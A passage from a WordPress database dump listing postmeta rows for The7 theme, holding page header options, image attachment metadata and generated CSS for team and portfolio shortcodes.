none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(27684,3701,'_edit_lock','1675593976:1'),
(27685,3702,'_wp_attached_file','2023/02/tut2m.jpg'),
(27686,3702,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:605;s:6:\"height\";i:267;s:4:\"file\";s:17:\"2023/02/tut2m.jpg\";s:8:\"filesize\";i:60360;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"tut2m-300x132.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:132;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10803;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"tut2m-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6064;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:17:\"tut2m-500x221.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:221;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23734;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(27687,3701,'_thumbnail_id','3702'),
(27688,3701,'_edit_last','1'),
(27689,3701,'_wpb_vc_js_status','true'),
(27690,3701,'_dt_sidebar_position','disabled'),
(27691,3701,'_dt_sidebar_widgetarea_id','sidebar_1'),
(27692,3701,'_dt_sidebar_hide_on_mobile','0'),
(27693,3701,'_dt_footer_show','1'),
(27694,3701,'_dt_footer_widgetarea_id','sidebar_2'),
(27695,3701,'_dt_footer_hide_on_mobile','0'),
(27696,3701,'_dt_header_title','fancy'),
(27697,3701,'_dt_header_background','normal'),
(27698,3701,'_dt_header_background_below_slideshow','disabled'),
(27699,3701,'_dt_header_transparent_bg_color_scheme','light'),
(27700,3701,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(27701,3701,'_dt_header_transparent_top_bar_bg_opacity','25'),
(27702,3701,'_dt_header_transparent_bg_color','#000000'),
(27703,3701,'_dt_header_transparent_bg_opacity','50'),
(27704,3701,'_dt_header_disabled_background','normal'),
(27705,3701,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(27706,3701,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(27707,3701,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(27708,3701,'_dt_header_disabled_transparent_bg_color','#000000'),
(27709,3701,'_dt_header_disabled_transparent_bg_opacity','50'),
(27710,3701,'_dt_page_overrides_top_margin',''),
(27711,3701,'_dt_page_overrides_right_margin',''),
(27712,3701,'_dt_page_overrides_bottom_margin',''),
(27713,3701,'_dt_page_overrides_left_margin',''),
(27714,3701,'_dt_mobile_page_padding_top',''),
(27715,3701,'_dt_mobile_page_padding_right',''),
(27716,3701,'_dt_mobile_page_padding_bottom',''),
(27717,3701,'_dt_mobile_page_padding_left',''),
(27718,3701,'_dt_fancy_header_layout_heading',''),
(27719,3701,'_dt_fancy_header_title_aligment','center'),
(27720,3701,'_dt_fancy_header_height','300'),
(27721,3701,'_dt_fancy_header_padding-top','0px'),
(27722,3701,'_dt_fancy_header_padding-bottom','0px'),
(27723,3701,'_dt_fancy_header_breadcrumbs_heading',''),
(27724,3701,'_dt_fancy_header_breadcrumbs','disabled'),
(27725,3701,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(27726,3701,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(27727,3701,'_dt_fancy_header_title_heading',''),
(27728,3701,'_dt_fancy_header_title_mode','custom'),
(27729,3701,'_dt_fancy_header_title',''),
(27730,3701,'_dt_fancy_header_title_font_size','30'),
(27731,3701,'_dt_fancy_header_title_line_height','36'),
(27732,3701,'_dt_fancy_header_text_transform','none'),
(27733,3701,'_dt_fancy_header_title_color_mode','color'),
(27734,3701,'_dt_fancy_header_title_color','#1a14cc'),
(27735,3701,'_dt_fancy_header_subtitle_heading',''),
(27736,3701,'_dt_fancy_header_subtitle',''),
(27737,3701,'_dt_fancy_header_subtitle_font_size','18'),
(27738,3701,'_dt_fancy_header_subtitle_line_height','26'),
(27739,3701,'_dt_fancy_header_subtitle_text_transform','none'),
(27740,3701,'_dt_fancy_header_subtitle_color_mode','color'),
(27741,3701,'_dt_fancy_header_subtitle_color','#1e73be'),
(27742,3701,'_dt_fancy_header_bg_heading',''),
(27743,3701,'_dt_fancy_header_bg_color','#222222'),
(27744,3701,'_dt_fancy_header_bg_image_origin','featured_image'),
(27745,3701,'_dt_fancy_header_bg_image','a:0:{}'),
(27746,3701,'_dt_fancy_header_bg_repeat','no-repeat'),
(27747,3701,'_dt_fancy_header_bg_position_x','center'),
(27748,3701,'_dt_fancy_header_bg_position_y','center'),
(27749,3701,'_dt_fancy_header_bg_fullscreen','1'),
(27750,3701,'_dt_fancy_header_bg_overlay','0'),
(27751,3701,'_dt_fancy_header_overlay_color','#000'),
(27752,3701,'_dt_fancy_header_bg_overlay_opacity','50'),
(27753,3701,'_dt_fancy_header_scroll_effect','default'),
(27754,3701,'_dt_fancy_header_bg_parallax','0.5'),
(27755,3701,'_dt_fancy_header_responsiveness_heading',''),
(27756,3701,'_dt_fancy_header_responsiveness','disabled'),
(27757,3701,'_dt_fancy_header_responsiveness_switch','778px'),
(27758,3701,'_dt_fancy_header_responsive_height','70'),
(27759,3701,'_dt_fancy_header_responsive_font_size','30'),
(27760,3701,'_dt_fancy_header_responsive_title_line_height','38'),
(27761,3701,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(27762,3701,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(27763,3701,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(27764,3701,'_dt_project_options_back_button',''),
(27765,3701,'_dt_project_options_show_link',''),
(27766,3701,'_dt_project_options_link',''),
(27767,3701,'_dt_project_options_link_target',''),
(27768,3701,'_dt_project_options_link_name',''),
(27769,3701,'_dt_project_options_hide_thumbnail','1'),
(27770,3701,'_dt_project_options_open_thumbnail_in_lightbox','0'),
(27771,3701,'_dt_project_options_related_mode','same'),
(27772,3701,'_dt_project_options_preview','normal'),
(27773,3701,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2023/02/tut2m.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #1a14cc;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #1e73be;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(27774,3701,'the7_shortcodes_dynamic_css','a:2:{s:32:\"dbaedb149f45aa70690560f8db3ad48c\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-dbaedb149f45aa70690560f8db3ad48c.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  